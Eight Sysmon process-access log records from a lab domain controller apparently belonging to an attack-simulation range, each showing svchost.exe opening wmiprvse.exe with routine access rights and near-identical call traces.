{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
